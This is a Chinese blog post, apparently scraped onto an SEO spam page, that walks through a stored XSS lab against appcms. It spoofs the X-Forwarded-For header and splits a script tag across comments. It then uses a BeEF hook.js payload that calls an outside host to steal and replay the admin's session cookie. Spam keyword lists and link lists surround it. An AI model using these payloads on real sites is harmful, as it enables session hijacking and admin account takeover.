当前位置: 首页 > news >正文

昆明 做网站 vr百度seo关键词优化电话

昆明 做网站 vr,百度seo关键词优化电话,找外包公司做个网站多少钱,扬州市网站建设一、环境 gethub上面自己找appcms-master 二、分析一下源码以及闯关思路 首先是有一个函数循环以及函数过滤,我们的post会将我们所传的所有val值去进行一个循环,之后通过htmlspecialchars这个函数进行过滤和转换所以val值不能通过单双引号闭合注入的方…

一、环境

gethub上面自己找appcms-master

二、分析一下源码以及闯关思路

首先是有一个函数循环以及函数过滤,我们的post会将我们所传的所有val值去进行一个循环,之后通过htmlspecialchars这个函数进行过滤和转换所以val值不能通过单双引号闭合注入的方式去做

 我们可以看到在getip中有三种传递方式

其中的HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR我们都可以去进行伪装,我们现在伪装HTTP_X_FORWARDED_FOR这个参数 

我们通过打印看一下它是如何去传的ip(因为断点无法传递这里的问题我现在也没找到程序太老了???)

 我们把打印换到引用代码的地方,可以见得是正常的打印了出来,且走到我们的打印函数里面了

那现在我们就要思考了。既然 HTTP_X_FORWARDED_FOR可以进行伪造的话,那怎么去处理隐伪呢?接下来我们抓包去看

可以看到我们的数据成功插入了

那两个都入了且拼接了 ,之后我们再次执行,补充另外半个<script>/*

之后管理员点击后台评论就可以实现自动弹窗了

我们通过三次拼接就可以达到插入最后弹窗如上

<script>/**/alert(1)/**/</script> 

而重要的是alert并没有偷走我们管理员的cookie,现在我们需要思考的是如何偷管理员cookie????(我们可以使用img的方法)

在这里我们使用kill里面的beff软件,正常下载,看了一篇文章讲解的挺细致的

【beef工具-01】神器beef的安装与简介-CSDN博客

我上面花出的这三个网站的意思很重要!!!

Web界面管理控制台:http://127.0.0.1:3000/ui/panel(用于查看上钩的鱼儿以及对不同的目标进行管理操作)
shellcode探针:http://127.0.0.1:3000/hook.js,只要有人运行该文件,就会在管理控制台上线(上钩)。
测试网址:http://127.0.0.1:3000/demos/butcher/index.html,只要有人访问该网站,也会在管理控制台上线(上钩)。

接下来我们要用的就是hook.js这个文件

我们首先创建一个demo2.html这个文件来进行测试

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body></body>
<script>var imgElement = document.createElement('img');imgElement.style.display = 'none';imgElement.src = "http://192.168.170.141:3000/hook.js"document.body.appendChild(`imgElement`)
</script>
</html>

 我们可以很清楚的看到是正常访问到了

那我们现在就要考虑在刚才的情况下我们如何盗取cookie,将我们刚才的HTML代码跟我们上面一样去评论区传入,数据库最终如下

 再传一个闭合最终

我们去管理界面下看是否访问到hook.js

 经过我多次尝试,刚才那种情况我们beef接收不到,img好像传递不了????但是确实是正常访问的

更改一下,可以重新抓包也可以数据库直接更新

"*/var scriptElemet = document.createElement('script');scriptElemet.src = 'http://192.168.170.141:3000/hook.js';document.body.appendChild(scriptElemet);/*"

很明显我们偷到cookie了

 去登录页面删掉cookie

利用cookie直接登录

http://www.hengruixuexiao.com/news/14894.html

相关文章:

  • 成都新线加做网站陕西企业网站建设
  • wordpress怎么收费青岛seo整站优化招商电话
  • 网络开发培训吉林seo推广
  • 东莞微信网站建设更好百度云网盘免费资源
  • 网站建设分金手指排名十二资源最多的磁力搜索引擎
  • 网站建设需要的文案网站优化有哪些类型
  • 网站上的链接怎么做的交换友情链接的要求有
  • 网站开发技术支持百度推广后台
  • 整站优化加盟百度搜索下载app
  • 网站建设看什么书360搜索推广官网
  • 日本人做的摇滚网站国内免费二级域名建站
  • pb 做网站企业员工培训课程有哪些
  • 上海网站建设就q479185700顶上网站提交百度收录
  • 一般做兼职在哪个网站品牌整合营销案例
  • 高端建站需要什么条件月嫂免费政府培训中心
  • 网站怎样绕过360认证合肥网络推广软件
  • 中国做外贸网站有哪些楚雄百度推广电话
  • vs做网站通过e浏览器网站页面优化包括
  • 网站建设与管理用什么软件有哪些内容免费网页在线客服系统
  • 新乡发布最新通告长沙seo优化哪家好
  • 最先进的深圳网站建设seo是干什么的
  • 网站建设主题上海搜索引擎优化seo
  • 做游戏直播什么游戏视频网站线上推广渠道有哪些
  • 政府网站建设方案书营销策划运营培训机构
  • 上海网站定制设计搜索引擎市场份额2023
  • 阿里云虚拟主机做淘客网站凡科建站小程序
  • phpwind 做的网站跨境电商seo是什么意思
  • wordpress备份到dropbox云巅seo
  • java做网站和php做网站6东莞网站建设快速排名
  • 国外一个做同人动漫的网站四川成都最新消息